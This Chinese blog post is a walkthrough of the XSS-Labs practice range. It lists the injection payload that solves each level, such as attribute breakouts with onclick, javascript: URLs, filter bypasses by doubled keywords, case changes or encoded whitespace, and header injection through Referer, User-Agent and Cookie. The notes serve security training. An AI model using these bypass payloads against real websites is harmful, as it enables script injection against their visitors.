XSS_Labs靶场通关笔记

每一关的方法不唯一;可以结合源码进行分析后构造payload;

通关技巧(四步):

1.输入内容看源码变化;

2.找到内容插入点;

3.测试是否有过滤;

4.构造payload绕过

第一关

构造payload:name=<script>alert()</script>

第二关

构造payload:" οnclick=alert() "

第三关

构造payload:' οnclick=alert() '

第四关

构造payload:" οnclick=alert() "

第五关

构造payload:"><a href="javascript:alert()">123</a>//

第六关

构造payload:" Onclick=alert() "

第七关

构造payload:" oonnclick=alert() "

第八关

在url中构造payload:javascr%09ipt:alert()

也可以用html实体编码替换script中的一个字符来绕过(方法很多,不演示)

第九关

构造payload:javascri&#112;t:alert('http://')

第十关

构造payload:t_sort=" οnclick=alert() type="

第十一关

通过bp抓包修改referer:" οnclick=alert() type="

第十二关

通过bp抓包修改User-Agent: " οnclick=alert() type="

第十三关

通过bp抓包修改Cookie: user=" οnclick=alert() type="

第十四关(坏了,直接略过)

第十五关

构造payload:src="level1.php?name=</h2><h2 οnclick=alert()>123"

第十六关

构造payload:keyword=<input%0Aοnclick=alert()>

对空格进行实体编码了,需要空格绕过

由于浏览器不支持flash,17、18、19、20略过

10

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-27 13:50:02       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-27 13:50:02       100 阅读
  3. 在Django里面运行非项目文件

    2024-01-27 13:50:02       82 阅读
  4. Python语言-面向对象

    2024-01-27 13:50:02       91 阅读

热门阅读

  1. MIT-Missing Semester_Topic 1: The Shell 练习题

    2024-01-27 13:50:02       44 阅读
  2. SpringBoot参数校验

    2024-01-27 13:50:02       56 阅读
  3. mysql数据库备份命令

    2024-01-27 13:50:02       54 阅读
  4. adb知识讲解

    2024-01-27 13:50:02       58 阅读
  5. 滑动窗口(算法)

    2024-01-27 13:50:02       52 阅读
  6. 算法训练营Day56(动态规划16)

    2024-01-27 13:50:02       52 阅读
  7. vcenter 里面有一台主机无法进行DRS处理实践。

    2024-01-27 13:50:02       51 阅读
  8. SQL 关键字参考手册(三)

    2024-01-27 13:50:02       40 阅读
  9. 编程笔记 html5&css&js 059 css多列

    2024-01-27 13:50:02       43 阅读
  10. 用于 C/C++ Debug 的宏函数

    2024-01-27 13:50:02       51 阅读